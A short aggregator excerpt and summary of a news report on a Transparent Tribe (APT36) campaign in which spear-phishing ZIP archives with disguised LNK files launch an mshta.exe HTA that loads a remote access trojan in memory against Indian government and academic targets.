"The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using "mshta.exe" that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users' suspicion."
"In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users' suspicion. "After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment," CYFIRMA noted. "This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability techniques commonly observed in malware abusing 'mshta.exe.'""
Transparent Tribe (APT36) targeted Indian governmental, academic, and strategic entities with a remote access trojan granting persistent control of infected hosts. The campaign began with spear-phishing emails containing ZIP archives with LNK files masquerading as PDFs; opening the LNK executes an HTA via mshta.exe which decrypts and loads the RAT directly into memory while opening a decoy PDF. After decoding, the HTA leverages ActiveX objects, notably WScript.Shell, for environment profiling and runtime manipulation to improve execution reliability. The threat actor maintains an evolving toolkit including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The malware adapts persistence techniques based on antivirus products.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]